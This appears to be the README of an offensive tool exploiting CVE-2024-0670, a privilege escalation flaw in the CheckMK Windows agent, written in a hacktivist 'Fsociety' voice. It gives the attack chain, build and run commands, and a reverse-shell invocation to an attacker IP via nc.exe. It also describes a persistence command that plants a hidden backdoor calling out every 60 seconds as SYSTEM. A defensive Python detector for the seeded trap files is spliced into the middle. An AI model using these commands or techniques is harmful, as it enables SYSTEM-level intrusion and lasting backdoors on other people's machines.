Native C++ Weapon | CheckMK Agent Local Privilege Escalation
Creator: C0deGhost | Version: 14.0 (Stable) | MITRE T1068
Fsociety Intel Report
This framework weaponizes **CVE-2024-0670**, a critical logic flaw in the CheckMK Agent for Windows. The vulnerability exists within the agent's plugin execution mechanism, specifically in how it handles temporary files within C:\Windows\Temp.
The Fsociety-CVE-2024-0670 exploit leverages a "Fail-Open" condition combined with a Race Condition to trick the NT AUTHORITY\SYSTEM service into executing arbitrary code provided by a low-privileged attacker.
The agent generates temporary batch files named `cmk_all_{PID}_{Counter}.cmd` and attempts to write them to the globally writable `C:\Windows\Temp` directory before executing them.
The Flaw (Fail-Open): If the agent encounters a file collision (e.g., the file already exists and is Read-Only), the write operation fails. However, the agent does not abort. Instead, it proceeds to execute the existing file, assuming it was successfully created by itself.
Attack Chain (Surgical):
- Reconnaissance: Identify the installation path via the Registry (Installer UserData).
- Seeding: Pre-create thousands of malicious `.cmd` files covering the probable PID range of the next agent execution.
- Locking: Apply `FILE_ATTRIBUTE_READONLY` to the seeded files using the native WinAPI to trigger the write failure.
- Trigger: Force a service restart via `msiexec /fa` (Repair Mode).
- Execution: The agent wakes up, fails to overwrite our trap, and executes our payload as SYSTEM.
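From the defender's side, the seeding and locking steps leave a recognisable footprint: many `cmk_all_{PID}_{Counter}.cmd` files in the temp directory, read-only, and not owned by the SYSTEM account that the agent runs as. The following is an added detection example, not code from the Fsociety tool or from the CheckMK agent; the listing fields (`name`, `readonly`, `owner`), the sample entries and the SYSTEM-owner heuristic are assumptions.

```python
"""Flag pre-seeded cmk_all_{PID}_{Counter}.cmd trap files in a temp-directory listing."""
import re
from typing import Dict, List, Optional, Tuple

# The agent's temp-file naming scheme described in the report.
TRAP_NAME = re.compile(r"^cmk_all_(\d+)_(\d+)\.cmd$", re.IGNORECASE)
AGENT_OWNER = "NT AUTHORITY\\SYSTEM"

# Constructed listing (hypothetical owners/PIDs); in practice built from a
# directory enumeration or a file-create telemetry feed for C:\Windows\Temp.
SAMPLE_LISTING: List[Dict] = [
    {"name": "cmk_all_4100_1.cmd", "readonly": True, "owner": "DESKTOP\\lowpriv"},
    {"name": "cmk_all_4104_1.cmd", "readonly": True, "owner": "DESKTOP\\lowpriv"},
    {"name": "cmk_all_4108_1.cmd", "readonly": True, "owner": "DESKTOP\\lowpriv"},
    # A file the agent itself wrote: writable and SYSTEM-owned, so not a trap.
    {"name": "cmk_all_3952_1.cmd", "readonly": False, "owner": AGENT_OWNER},
    {"name": "msiexec.log", "readonly": False, "owner": AGENT_OWNER},
]


def find_seeded_traps(entries: List[Dict]) -> List[Dict]:
    """Return agent-named .cmd files the agent did not create: read-only and not SYSTEM-owned."""
    traps = []
    for e in entries:
        m = TRAP_NAME.match(e["name"])
        if not m:
            continue
        if e["readonly"] and e["owner"].upper() != AGENT_OWNER:
            traps.append({"name": e["name"], "pid": int(m.group(1)), "owner": e["owner"]})
    return traps


def assess(entries: List[Dict], min_traps: int = 2) -> Dict:
    """Summarise the traps; several read-only trap files spanning a PID range is the seeding signature."""
    traps = find_seeded_traps(entries)
    pids = sorted(t["pid"] for t in traps)
    pid_range: Optional[Tuple[int, int]] = (pids[0], pids[-1]) if pids else None
    return {
        "seeding_suspected": len(traps) >= min_traps,
        "trap_count": len(traps),
        "pid_range": pid_range,
        "owners": sorted({t["owner"] for t in traps}),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_LISTING))
```

Pairing this with a follow-up check for an unexpected `msiexec /fa` repair of the agent's MSI gives both halves of the chain the report describes.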
We are the bug in the system.
- Tactic: Privilege Escalation
- Technique: Exploitation for Privilege Escalation
```mermaid
graph TD;
A["Attacker (Low Priv)"] --> B{Seeding Phase};
B --> C[Create Malicious .cmd Files];
C --> D[Set ReadOnly Attribute];
D --> E{Trigger Phase};
E --> F[Invoke msiexec /fa];
F --> G[CheckMK Service Restarts];
G --> H{Write Attempt};
H -- "Fails (Access Denied)" --> I["Fail-Open Logic"];
I --> J[Execute Existing File];
J --> K["SYSTEM Shell"];
%% Fsociety styles
style A fill:#222,stroke:#ff0000,stroke-width:2px,color:#ff0000
style I fill:#222,stroke:#ffff00,stroke-width:2px,color:#ffff00
style K fill:#222,stroke:#ff0000,stroke-width:4px,color:#ff0000
```
- Native C++ Architecture: Written in pure C++ using the WinAPI. No external dependencies (Python/PowerShell) required on the target. Fast, stealthy, and lightweight.
- Interactive Shell Mode: Provides a pseudo-shell environment (`--Shell-mode`) that allows executing commands as SYSTEM repeatedly without re-running the exploit.
- Persistence Module: Built-in `Install-persistence` command. Deploys a hidden, self-healing backdoor in `C:\ProgramData` executing as SYSTEM.
- Smart Registry Detection: Automatically hunts for the CheckMK MSI path in `Installer\UserData` to trigger the repair, bypassing standard obfuscation.
- Surgical Verbose: Detailed operational logging for Red Team debugging and forensic analysis.
Give a man a gun and he'll rob a bank. Give a man knowledge and he'll rob the world.
Fsociety Operation Manual
Use MinGW-w64 to build the static binary.
```
x86_64-w64-mingw32-g++ Fsociety-CVE-2024-0670.cpp -o Fsociety-CVE-2024-0670.exe -static -lws2_32
```
Transfer Fsociety-CVE-2024-0670.exe and nc.exe to the target machine (e.g., C:\Windows\Temp).
Mode A: Interactive Shell (Recommended)
```
.\Fsociety-CVE-2024-0670.exe --Shell-mode
```
Mode B: Direct Reverse Shell (Single Shot)
```
.\Fsociety-CVE-2024-0670.exe --LHOST 10.10.16.2 --LPORT 4444 --Directory-netcat C:\Windows\Temp\nc.exe
```
Proof of Concept Gallery
Professional CLI with centered parameters and Fsociety aesthetics.
Entering the Exploit-Shell environment. The framework handles the race condition in the background for every command.
Executing whoami and verifying nt authority\system privileges via the exploit.
Using the internal Install-persistence command to deploy a permanent backdoor.
Catching the SYSTEM shell on the attacker machine.
Real-time analysis of the seeding process and trigger execution.
Command Line Interface
| Flag | Description |
|---|---|
| `--help` | Show the help menu and banner. |
| `--Shell-mode` | Enter the interactive pseudo-shell loop. Enables internal commands. |
| `--Command <CMD>` | Execute a single command as SYSTEM and exit (non-interactive). |
| `--LHOST <IP>` | Attacker IP address (required for reverse shell). |
| `--LPORT <PORT>` | Attacker port (required for reverse shell). |
| `--Directory-netcat` | Path to nc.exe on the target. Default: `C:\Windows\Temp\nc.exe`. |
| `--Verbose` | Enable surgical logging (file creation, API calls, Registry scan). |
Available only when inside the `--Shell-mode` prompt.
| Command | Description |
|---|---|
| `Install-persistence` | Deploys a hidden .bat file in `C:\ProgramData` that executes a reverse shell every 60 seconds as SYSTEM. |
| `Eliminate-persistence` | Surgically removes the backdoor file and kills the associated processes to clean tracks. |
| `<Any Command>` | Executes standard Windows commands (e.g., `whoami`, `ipconfig`, `type flag.txt`). |
This tool is intended for educational purposes, security research, and authorized penetration testing engagements only. The author (C0deGhost) and Fsociety are not responsible for any misuse or damage caused by this program. Use this tool ethically and responsibly.
Control is an illusion.
WE ARE FSOCIETY. WE ARE FINALLY FREE. WE ARE FINALLY AWAKE.